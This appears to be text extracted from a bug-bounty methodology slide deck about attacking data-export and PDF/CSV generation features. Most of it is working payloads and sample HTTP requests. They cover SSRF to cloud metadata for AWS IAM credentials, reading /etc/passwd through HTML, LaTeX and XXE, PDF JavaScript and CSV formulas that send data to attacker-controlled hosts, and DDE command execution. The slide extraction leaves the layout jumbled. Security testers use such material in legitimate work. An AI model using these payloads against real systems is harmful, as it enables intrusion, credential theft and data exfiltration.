This Is of No Use
This Is of No Use
Generation
Download Your Information
Mahmoud M. Awali
@0xAwali
My Methodology
attacker
If There Is PDF Generation Process , Inject Blind XSS Payloads e.g. <img src="http://me:80">
OR <style><iframe src="http://me:80"> To Figure Out There Is HTML Rendering OR Not
● Video
POST /downloadDATA HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
name=<img src="http://me:80">&address=egy&fileTYPE=pdf
My Methodology
attacker
If There Is PDF Generation Process , Inject LFI Payloads e.g. <link rel=attachment
href="file:///etc/passwd"> OR <script>document.write('<iframe src=file:///etc/passwd></iframe>');
</script> To Read Local Files
attacker
If There Is PDF Generation Process , Inject Blind XSS Payloads With IP 169.254.169.254
e.g. "><iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials"></iframe> To
Read The AWS IAM role name
● Video POST /downloadDATA HTTP/1.1
Host: company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
● Writeup Content-Length: Number
attacker
attacker
name=<office:text><text:section text:name="string">
<text:section-source xlink:href="http://169.254.169.254/latest/meta-data/
xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/>
</text:section></office:text>&address=egy&fileTYPE=pdf
List Of Payloads You Must Use Its If There Is PDF Generation Bases On Input
attacker
/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action>>/>>(
/blah)>>/A<</S/JavaScript/JS(app.alert(1);
this.submitForm({
cURL: 'https://id.burpcollaborator.net',cSubmitAs: 'PDF'}))
/Type/Action>>/>>(
● Slides /blah)>>/A<</S/JavaScript/JS(app.alert(1)
/)/S/JavaScript/JS(app.alert(1)
/) >> >>
<</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0
0] /A <</S/SubmitForm/Flags 0/F(https://id.burpcollaborator.net
My Methodology
attacker
If You Can Export Your Data As Spreadsheet Files , Inject CSV Payloads e.g. =sum(10+10)
, =cmd|' /C calc'!A0 , DDE ("cmd";"/C calc";"!A0") OR @SUM(1+1)*cmd|' /C calc'!A0 To Get RCE
● Blog
POST /downloadDATA HTTP/1.1
Host: company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number
name=me=cmd|' /C calc'!A0&address=egy&fileTYPE=csv
List Of CSV Payloads
attacker
HYPERLINK("https://me.com", "ME")
● Blog =cmd|' /C notepad'!'A1'
=cmd|' /C ping IP-Of-Me'!'A1'
● Blog ='file:///etc/passwd'#$passwd.A1
=WEBSERVICE(CONCATENATE("http://me.com/",('file:///etc/passwd'#$passwd.A1)))
My Methodology
attacker
If You Can Download XML Content As PDF , Inject XXE Payloads e.g. <?xml version="1.0"
encoding="UTF-8"?><!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://me.com/evil.dtd"> %asd; %c;]>
To Get OOB XXE
● Writeup POST /downloadDATA HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Content-Type: application/xml
Content-Length: Number
name=me&code=<?xml version="1.0"
encoding="UTF-8"?><!DOCTYPE a [ <!ENTITY % asd
SYSTEM "http://me.com/evil.dtd"> %asd;
%c;]>&fileTYPE=xml-to-pdf
My Methodology
attacker
If You Can Write Latex Code To Convert It To PDF , Inject Latex Payloads e.g. \newread\file
\openin\file=/etc/passwd\loop\unless\ifeof\file\read\file to\fileline\text{\fileline}\repeat\closein\file To
Read Local Files
● Writeup POST /downloadDATA HTTP/1.1
Host: company.com
● Payloads User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number
name=me&code=\newread\file\openin\file=/etc/passwd\loo
p\unless\ifeof\file\read\fileto\fileline\text{\fileline}\repeat\
closein\file&fileTYPE=latex-to-pdf
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip
Thank
You
Mahmoud M. Awali
@0xAwali